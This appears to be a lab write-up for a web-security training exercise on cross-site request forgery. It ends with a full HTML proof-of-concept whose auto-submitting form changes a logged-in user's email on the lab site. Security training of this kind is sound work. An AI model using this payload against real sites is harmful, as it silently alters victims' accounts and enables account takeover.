First we logged in using the credentials we were given :
We captured the request when trying to update the email :
We pasted that request to https://csrfshark.github.io/app/ and was able to generate a CSRF Payload for free (We can generate it from the Burp Professional Itself also).
We stored that result in the Exploit servers body and Stored it :
We could see this page when viewing our exploit :
After clicking the Submit Request button, Our email was changed to the one we added in the payload :
Since we had to manually click the submit button, We added the below tag to our payload to autosubmit the form when a user visited the page :
<script>
document.forms[0].submit();
</script>Now visiting our malicious page automatically sent the POST request and changed the email of the user :
After clicking Deliver exploit to victim still the lab didn’t solve even our manual testing worked. So we used chatGPT to fix the spacing of the HTML code and clicked it again and was able to solve the lab :
<!DOCTYPE html>
<html lang="en">
<body>
<h1>Form CSRF PoC</h1>
<form method="POST" action="https://0a95004c03c7151a8ddb2a6000be0090.web-security-academy.net/my-account/change-email">
<input type="hidden" name="email" value="pwned@normal-user.net">
<input type="submit" value="Submit Request">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
